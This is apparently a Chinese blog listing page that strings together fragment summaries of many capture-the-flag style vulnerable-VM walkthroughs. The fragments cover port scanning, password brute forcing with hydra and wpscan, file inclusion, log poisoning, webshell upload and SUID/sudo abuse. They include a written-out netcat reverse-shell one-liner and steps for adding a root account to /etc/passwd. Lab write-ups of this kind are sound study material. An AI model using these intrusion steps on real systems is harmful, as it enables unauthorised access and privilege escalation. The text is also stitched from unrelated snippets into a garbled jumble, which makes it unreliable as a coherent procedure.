qq_63283137的博客

解密发现没有利用地方，发现位置是home下的，那就存在ssh用户，或者爆破ssh也可以。提示：用户名pwnlab，密码简单，建议修改。发现可以登录anonymous匿名访问。既然这样，可以爆破一波ftp登录密码。arp-scan -l扫描同网段主机。发现可以使用find有root权限。访问80端口，apache页面。是32位，是md5加密，解密去。尝试访问21端口，试试弱口令。查看当前用户的命令权限。nmap常规的扫描端口。hydra的登录爆破。

之前22端口的ssh服务，查看下此用户是否有密钥文件。思路：自己按照passwd存储格式生成一个高权限账户，并写入到passwd文件内，再切换用户。先猜测参数名是什么，index.html是存在的文件，--hw 0 隐藏返回的数据是0的。robots文件下是人名，记录下，试试ssh爆破,无效。有返回结果，说明接收的参数正确，尝试访问敏感文件。可以切换路径读取文件，说明存在文件包含漏洞。发现存在私钥，复制保存，爆破私钥的使用密码。生成密码，切换用户，拿到root权限。查看权限，分析文件权限，查看文件。

用 arsene 调用 /home/arsene/heist.py会产生一个shell权限-->拥有arsene权限-->切换到arsene用户。可以写入执行命令获取shell-->heiset.py引用-->库中命令就会被执行-->获取shell。john只会破解一次，记录再~/.john/john.pot文件中。~是家目录，尝试找到与此相似的路径，使用wfuzz工具对其路径进行测试。不需要密码可以使用arsene用户的权限去操作这两个文件。提示使用的破解字典了，john破解密码。

smb服务是一个协议名，它能被用于Web连接和客户端与服务器之间的信息沟通，通过 SMB 协议，客户端应用程序可以在各种网络环境下读、写服务器上的文件，以及对服务器程序提出服务请求。可以配置操作系统内部，如用户，磁盘配额，服务或配置文件，以及修改和控制开源应用程序。每当看到二进制文件的副本时，都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户，与解密出的密码尝试登录webmin。再分析扫描出的信息，发现端口服务是smb。发现密码备份文件，但是没有任何的权限。

发现存在文件包含漏洞，使用端口敲门服务（知道它的自定义端口后，依次对其进行敲门，然后就可以开启ssh服务从而进行连接了。它的默认配置文件为：/etc/knockd.conf）知道它的这个配置文件的内容就可以得到它自定义的端口号，用LFI把这个文件爆出来。发现是个python脚本，既然拥有root权限，那我们就可以构造一个拥有root权限的用户，并且在/etc/passwd文件中储存，再使用这个用户登录后，就可以获取到root权限。访问80端口，简单查看了一下网站，发现有搜索功能。访问22端口，被过滤掉了。

根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码，尝试登录80端口http、22端口ssh。查看当前用户的sudo权限，发现可以sudo执行awk命令。是个管理员登录界面，使用burp弱口令爆破，无用。发现这个主题有个文件上传的命令执行漏洞，先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面，随手ssh爆破试试。尝试访问上面的目录，发现有个图片。发现有个ova镜像文件，下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。

kira用户可以使用sudo的任意命令，那直接切换用户好了：sudo su - 默认是切换root用户。login.php是登录页面，想着登录进去，弱口令字典+burp爆破下。得到密码kiraisevil，写入密码字典后，再用九头蛇爆破一遍。提示登录用户名在user.txt文件中，密码在网站中需要自己找。用户，字典都有了，使用wpscan开始爆破用户登录网页。发现notes.txt，点击，访问文件地址。根据收集的账户，密码进行爆破ssh用户。使用爆破的账户密码，登录成功。

试试https的443与http的80、一般服务器都不会限制这些端口，访问2.php并监听443。写入文件2.php，并用浏览器访问2.php，进行反弹用户的shell。反弹shell，nc -e参数不支持，bash -i也不支持。发现反弹不成功，试了很多反弹命令都不成功，可能是端口限制。成功反弹shell，查看系统的版本内核信息。尝试登录ftp，使用上面的两个账户密码。

原因一、没有开启nat模式原因二、虚拟网络编辑器错误原因三、靶机网卡配置错误。

bin/bash 的shell环境拷贝到getshell文件中，并赋予getshell文件suid权限。back.sh执行备份完成，生成了getshell文件，再执行getshell文件就获得root权限。翻译//伙计，我知道你是新来的但你应该知道怎么用主机文件到达我们的秘密地点。既然ip对应的dns被修改了，格式是主域名，扫描下子域名看看。可以知道这是本地的dns解析，修改/etc/host文件。简单的浏览 下，再去80端口看看，查看下网站源码。访问扫描出的目录文件，这些文件语言脚本都没啥用。

cat /tmp/f|/bin/sh -i 2>&1|nc ip 端口>/tmp/f。蚂蚁剑不适合提权，协议冲突不能持久链接，需要反弹shell到kali，为后续提权做准备。密码写入到pass.txt，john破解（可以破解多种加密方式的工具）版本为3.7.0，使用漏洞库searchsploit查找一下漏洞情况。蚁剑链接，第一次错误，查了下才知道目录在什么位置。创建一句话木马，且显示了保存到的路径。查看系统版本信息，根据漏洞库查找一下。此用户不是root用户，需要提权。接着跑出表，列，数据。

在目标机，在本地从kaili获取文件(scpy kaili的ip:文件名 本地目录)john用户登录成功,找到能执行php代码,写入反弹shell语句,进行反弹shell。权限低,没有其他sudo可利用的权限,find查看下有suid权限的文件命令。在说明里,有两个使用方法,将文件复制出来(建议复制到/tmp,不限权限)kali端监听,成功反弹shell,升级交互shell。上面已经写入,提交内容,来执行下写入的php语句。利用一下此shell脚本,这是个可以提权的脚本。破解密码是trutle。

1，常规的扫描ip、端口、目录2、目录没利用点3、借助外界源码，链接用户4、用户没权限、有可利用的文件5、修改admin账户，拿webshell6、反弹shell，提权。

有个root权限执行的nmap，nmap--script 参数可以执行脚本，只需写入提权脚本到此文件，再执行。这个文件中写入/bin/bash命令，然后以jens用户身份运行就可以获取到jens的shell了。水平越权，ssh链接此用户，sudo -l查看可以使用其他shell执行的文件。这账号不是root权限，一般home有用户信息，找到文件中有一组账户密码。扫描wordpress中的存在的用户，并写入到user.txt文件中。页面登录成功，这账户没啥操作权限，发现wordpress的一个插件。

在地球历史的最初10亿年里，海洋中出现了生命，并开始影响地球的大气和表面，导致厌氧生物的激增，后来又出现了好氧生物。从上面内容得到了一个信息，加密算法是xor，有个testdata.txt文件，用户名是terra。发现有个testingnotes文件，但是不知道是何种格式，自己尝试测试发现是txt文件格式。或者我们应该每周换一次钥匙?发现是禁止远程链接，发现需要对ip地址进行16进制的转化绕过。*需要改进的消息界面和管理面板的界面，它目前是非常基本的。*使用XOR加密作为算法，应该是安全的RSA使用。

使用openssl生成newroot-666的密码加密，并写入到passwd。尝试admin弱口令登录，提升不存在用户名，可使用之前记录的用户名尝试。复制passwd传到kali，复制出来的文件在kali的挂载点里。想查看.ssh文件，发现需要权限，尝试添加1001的用户和组。挂载点的passwd原文件不可写入，需要复制出来进行写入。拿出私钥，利用私钥登录karl这个普通用户的管理。提示需要使用私钥的密码，使用john破解密码。再kali上远程挂载此文件，并查看内容。进入.ssh文件，查看到有flag。

每个端口都需进行探测，但8000是nginx代理，信息归属真实的80端口。Wordpress探测工具—wpscan：可以探测admin用户与信息，可用于登录。1.搜索kali同一网段的存在的ip地址：192.168.72.129。发现端口下的web目录，再基于端口进行尝试访问下面每个web目录。准备：部署好Durain靶机，并设置网络配置为nat模式。刷新，查看代码，即可获取到了 / 下的目录。尝试查看etc/passwd的用户信息文件。查看代码，看出访问日志用户。针对扫描出的端口分析。

可以显示，说明文件包含漏洞可以利用，这是nginx系统，含有日志默认存在/var/log/nginx以.log结尾，fuzz爆破日志文件名。找到了两个文件，查看下内容，脚本默认路径：/usr/share/exploitdb/exploits/linux/local/可以访问，发现我们的操作都会被access.log日志记录，那么写入一句话木马也会被记录到日志里。将三段代码放进三个文件中，libhax.c/rootshell.c/run.sh。发现file参数可以使用，读取敏感文件/etc/passwd。

执行完成，获得了meterpreter（Meterpreter是Metasploit框架中的一个扩展模块，是返回给我们的一个控制通道，用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接，功能强大：可以提权、打开shell、显示密码，显示主机信息、截屏、上传下载、隐藏、躲避系统的扫描等）根据第一个flag提示去寻找cms的cinfig file 并且Drupal的默认配置文件为 /var/www/sites/default/settings.php，查看一下发现flag2。

发现ip端口扫描，端口信息更详细看内容开始访问端口情况，进行探测基于80端口：可能是用户名，记录下尝试xss注入，没反应，抛弃爬虫规则，有admin.php尝试admin弱口令登录，提升不存在用户名，可使用之前记录的用户名尝试利用burp尝试，用户与密码破解无效，放弃基于2049端口：有nfs网络共享文件系统，尝试利用查看nfs服务器信息，有...

这个用户也不是root权限，那就sudo-l查看有哪些权限，发现有个命令不需要密码可以执行。jim用户查看到一个邮件的文件，去/var/mail目录查看还有没有其他邮件。那我们去抓包试试看，看到第一个命令传输的是ls+-h，再去看看其他两个包。查看下文件，home的用户，旧的password文件。发现有exim4命令，可以提权，查看版本号为4.89。查看一下用户权限和一些文件信息，还是没找到想要信息。知道了密码本，还有用户名。发现charles的登录密码，登录看看。访问，都需要登录，要不然就是错误页面。

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。您仍然需要获得最终flag（唯一真正重要的flag！继续 - git outta here！Cewl 是以爬虫模式在指定URL上收集单词的工具，并将其制作成密码字典，以提高密码破解工具的成功率。rbash是受限的shell，它与一般标准shell的区别在于会限制执行一些行为。

信息收集、信息利用、漏洞攻击、提权等